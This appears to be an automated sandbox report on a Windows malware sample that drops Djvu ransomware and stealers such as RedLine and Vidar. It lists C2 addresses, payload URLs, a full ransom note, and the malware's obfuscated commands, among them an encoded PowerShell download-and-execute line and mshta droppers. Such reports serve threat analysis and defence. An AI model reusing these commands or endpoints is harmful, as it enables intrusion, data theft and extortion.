Analysis
  max time kernel: 1200s
  max time network: 1219s
  submitted: 01-01-1970 00:00
  Static task: static1
  Behavioral task: behavioral1
    Sample: bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    Resource: win7-en-20210920
  Behavioral task: behavioral2
    Sample: bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    Resource: win10-en-20211014
General
  Target: bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
  Size: 341KB
  MD5: bb13f6d819f3b18ebbfe1fb2e0d6c1ed
  SHA1: 7449eecd5006784372a71b1f9f05f74bbe0cd0c7
  SHA256: bac4bdaaae7da623a7ba01a0ddfe807c285a36afa6dc502429d407ba70fa4a73
  SHA512: 1763e7b5f21ae06af2da655166f46a958f6089e54b649a68cd9540d6623f9e08e51a87b0a856eaadd79824172a8920d997ae1936ca8eee79b85f5f5d7fdf41cd
Malware Config

Extracted: djvu (C:\_readme.txt)
  manager@mailtemp.ch
  supporthelp@airmail.cc
  https://we.tl/t-CcXGxzXf71

Extracted: smokeloader (2020)
Extracted: redline (11111)
  93.115.20.139:28978

Extracted: vidar 41.6 (754)
  https://mas.to/@lilocc
  profile_id: 754

Extracted: raccoon (60e59be328fbd2ebac1839ea99411dccb00a6f49)
  url4cnc:
Extracted: raccoon (04256a88c32735dbae9e9e965ae6cfecb37a8ec5)
  url4cnc:
Extracted: redline (SafeInstaller)
  185.183.32.161:80

Extracted: raccoon (b6c3d41f039fbc353edce408d14ca491fee838d3)
  url4cnc:
Extracted: djvu
  http://rlrz.org/lancer/get.php
  extension: .rivd
  offline_id: WbO7bkwHxaepEmevfYYUBNgcxNJGpd7hoNKokRt1
  payload_url:
    http://znpst.top/dl/build2.exe
    http://rlrz.org/files/1/build3.exe
  ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CcXGxzXf71 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0342gSd743d

Extracted: redline (z0rm1on)
  185.215.113.94:15564

Extracted: vidar 41.6 (706)
  https://mas.to/@lilocc
  profile_id: 706

Extracted: redline (MONEY-2021)
  2.56.214.190:59628

Extracted: vidar 41.5 (517)
  https://mas.to/@xeroxxx
  profile_id: 517
Signatures

Bazar Loader
  Detected loader normally used to deploy BazarBackdoor malware.

Detected Djvu ransomware (6 IoCs)
  Processes:
    resource  yara_rule
    behavioral1/memory/1652-180-0x0000000000424141-mapping.dmp  family_djvu
    behavioral1/memory/1652-179-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
    behavioral1/memory/1952-183-0x0000000004510000-0x000000000462B000-memory.dmp  family_djvu
    behavioral1/memory/1652-184-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
    behavioral1/memory/2664-251-0x0000000000424141-mapping.dmp  family_djvu
    behavioral1/memory/2664-263-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu

Djvu Ransomware
  Ransomware which is a variant of the STOP family.

RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (5 IoCs)
  Processes:
    resource  yara_rule
    behavioral1/memory/1296-81-0x0000000000520000-0x000000000053A000-memory.dmp  family_redline
    behavioral1/memory/1736-159-0x0000000000610000-0x000000000062A000-memory.dmp  family_redline
    behavioral1/memory/1824-195-0x0000000000500000-0x000000000051A000-memory.dmp  family_redline
    behavioral1/memory/1604-268-0x0000000002C80000-0x0000000002C9C000-memory.dmp  family_redline
    behavioral1/memory/1604-272-0x0000000004730000-0x000000000474B000-memory.dmp  family_redline

SmokeLoader
  Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes:
    description  pid  process  target process
    PID 1752 created 1204  1752  regsvr32.exe  Explorer.EXE

Bazar/Team9 Loader payload (2 IoCs)
  Processes:
    resource  yara_rule
    \Users\Admin\AppData\Local\Temp\403F.dll  BazarLoaderVar5
    C:\Users\Admin\AppData\Local\Temp\403F.dll  BazarLoaderVar5

Vidar Stealer (7 IoCs)
  Processes:
    resource  yara_rule
    behavioral1/memory/1100-101-0x0000000000400000-0x0000000002F6F000-memory.dmp  family_vidar
    behavioral1/memory/1100-100-0x0000000004740000-0x0000000004816000-memory.dmp  family_vidar
    behavioral1/memory/1496-210-0x00000000002E0000-0x00000000003B6000-memory.dmp  family_vidar
    behavioral1/memory/1496-228-0x0000000000400000-0x0000000002C15000-memory.dmp  family_vidar
    behavioral1/memory/2396-288-0x00000000004A18CD-mapping.dmp  family_vidar
    behavioral1/memory/2356-291-0x00000000002F0000-0x00000000003C6000-memory.dmp  family_vidar
    behavioral1/memory/2396-292-0x0000000000400000-0x00000000004D9000-memory.dmp  family_vidar

Downloads MZ/PE file

Executes dropped EXE (63 IoCs)
Modifies extensions of user files (12 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
    description  ioc  process
    File renamed  C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.rivd  C4A.exe
    File renamed  C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.rivd  C4A.exe

Tries to connect to .bazar domain (7 IoCs)
  Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
  Processes:
    flow  ioc
    188  bluehail.bazar
    189  whitestorm9p.bazar
    136  reddew28c.bazar
    137  bluehail.bazar
    138  whitestorm9p.bazar
    139  aqsouhyw.bazar
    187  reddew28c.bazar

Deletes itself (1 IoCs)
  Processes:
    pid   process
    1204  Explorer.EXE

Loads dropped DLL (40 IoCs)
Modifies file permissions (1 TTPs, 1 IoCs)

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
    description  ioc  process
    Set value (str)  \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\94083928-3961-499c-8af9-20acea08c6f8\\C4A.exe\" --AutoStart"  C4A.exe

Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow  ioc
    92   api.2ip.ua
    107  api.2ip.ua
    180  api.2ip.ua
    91   api.2ip.ua

Suspicious use of SetThreadContext (25 IoCs)
  Processes:
    description  pid  process  target process
    PID 320 set thread context of 1048  320  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    PID 1496 set thread context of 432  1496  1555.exe  1555.exe
    PID 1952 set thread context of 1652  1952  C4A.exe  C4A.exe
    PID 2404 set thread context of 2664  2404  C4A.exe  C4A.exe
    PID 2356 set thread context of 2396  2356  build2.exe  build2.exe
    PID 1196 set thread context of 2052  1196  build3.exe  build3.exe
    PID 2848 set thread context of 2788  2848  mstsca.exe  mstsca.exe
    PID 2908 set thread context of 2780  2908  uethwru  uethwru
    PID 3056 set thread context of 3064  3056  mstsca.exe  mstsca.exe
    PID 2336 set thread context of 860  2336  mstsca.exe  mstsca.exe
    PID 1752 set thread context of 1052  1752  regsvr32.exe  chrome.exe
    PID 1688 set thread context of 2008  1688  mstsca.exe  mstsca.exe
    PID 2572 set thread context of 2956  2572  mstsca.exe  mstsca.exe
    PID 2496 set thread context of 2440  2496  mstsca.exe  mstsca.exe
    PID 1740 set thread context of 1416  1740  mstsca.exe  mstsca.exe
    PID 2128 set thread context of 2632  2128  mstsca.exe  mstsca.exe
    PID 1400 set thread context of 2492  1400  mstsca.exe  mstsca.exe
    PID 2712 set thread context of 2672  2712  mstsca.exe  mstsca.exe
    PID 2884 set thread context of 2288  2884  mstsca.exe  mstsca.exe
    PID 2888 set thread context of 1280  2888  uethwru  uethwru
    PID 2628 set thread context of 1940  2628  C4A.exe  C4A.exe
    PID 300 set thread context of 2296  300  mstsca.exe  mstsca.exe
    PID 2688 set thread context of 1752  2688  mstsca.exe  mstsca.exe
    PID 2392 set thread context of 2276  2392  mstsca.exe  mstsca.exe
    PID 2056 set thread context of 2328  2056  mstsca.exe  mstsca.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (4 IoCs)
  Processes:
    pid   pid_target  process  target process
    1336  1100  WerFault.exe  3843.exe
    2004  1044  WerFault.exe  49C2.exe
    2092  1496  WerFault.exe  D83.exe
    2584  2396  WerFault.exe  build2.exe

Checks SCSI registry key(s) (3 TTPs, 21 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
    description  ioc  process
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1555.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  2C02.exe
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1555.exe
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  uethwru
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1555.exe
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  2C02.exe
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  2C02.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  jjthwru

Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
    pid   process
    2428  schtasks.exe
    2660  schtasks.exe

Kills process with taskkill (2 IoCs)
  Processes:
    pid   process
    2020  taskkill.exe
    2164  taskkill.exe
Modifies Internet Explorer settings
  Processes:
    description  ioc  process
    Key created  \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Modifies system certificate store
  Processes:
    description  ioc  process
    Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349  C4A.exe
    Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary blob omitted)  C4A.exe
    Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349  C4A.exe
    Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary blob omitted)  C4A.exe
    Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary blob omitted)  C4A.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (5 IoCs)
  Processes:
    pid   process
    1204  Explorer.EXE
    1336  WerFault.exe
    2004  WerFault.exe
    2092  WerFault.exe
    2584  WerFault.exe

Suspicious behavior: MapViewOfSection (7 IoCs)
  Processes:
    pid   process
    1048  bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
    432   1555.exe
    1872  2C02.exe
    2780  uethwru
    2892  jjthwru
    2464  jjthwru
    1280  uethwru

Suspicious use of AdjustPrivilegeToken (25 IoCs)
  Processes:
    description  pid  process
    Token: SeDebugPrivilege  1296  2389.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  1336  WerFault.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  1736  7587.exe
    Token: SeDebugPrivilege  860  powershell.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  2004  WerFault.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  1824  115B.exe
    Token: SeDebugPrivilege  2020  taskkill.exe
    Token: SeDebugPrivilege  2164  taskkill.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  2092  WerFault.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeDebugPrivilege  1604  16D9.exe
    Token: SeDebugPrivilege  2584  WerFault.exe
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE
    Token: SeShutdownPrivilege  1204  Explorer.EXE

Suspicious use of FindShellTrayWindow (8 IoCs)
  Processes:
    pid   process
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE

Suspicious use of SendNotifyMessage (4 IoCs)
  Processes:
    pid   process
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
    1204  Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1555.exeC:\Users\Admin\AppData\Local\Temp\1555.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1555.exeC:\Users\Admin\AppData\Local\Temp\1555.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2389.exeC:\Users\Admin\AppData\Local\Temp\2389.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2C02.exeC:\Users\Admin\AppData\Local\Temp\2C02.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3843.exeC:\Users\Admin\AppData\Local\Temp\3843.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 8883⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\403F.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\49C2.exeC:\Users\Admin\AppData\Local\Temp\49C2.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 5283⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5651.exeC:\Users\Admin\AppData\Local\Temp\5651.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6511.exeC:\Users\Admin\AppData\Local\Temp\6511.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6BD5.exeC:\Users\Admin\AppData\Local\Temp\6BD5.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7587.exeC:\Users\Admin\AppData\Local\Temp\7587.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C4A.exeC:\Users\Admin\AppData\Local\Temp\C4A.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C4A.exeC:\Users\Admin\AppData\Local\Temp\C4A.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\94083928-3961-499c-8af9-20acea08c6f8" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\C4A.exe"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C4A.exe"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Modifies extensions of user files
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 8768⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\D83.exe (level 2)
C:\Users\Admin\AppData\Local\Temp\D83.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (level 3)
C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 888
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\115B.exe (level 2)
C:\Users\Admin\AppData\Local\Temp\115B.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\13BD.exe (level 2)
C:\Users\Admin\AppData\Local\Temp\13BD.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe (level 3)
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
-
C:\Windows\SysWOW64\cmd.exe (level 4)
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\13BD.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\13BD.exe") do taskkill /iM "%~nXN" -f
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE (level 5)
MXB89oH1.eXE /poMZbeSahrmSD~4GRjd
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe (level 6)
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe (level 7)
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f
-
C:\Windows\SysWOW64\mshta.exe (level 6)
"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )
-
C:\Windows\SysWOW64\cmd.exe (level 7)
"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ
-
C:\Windows\SysWOW64\cmd.exe (level 8)
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
-
C:\Windows\SysWOW64\cmd.exe (level 8)
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"
-
C:\Windows\SysWOW64\msiexec.exe (level 8)
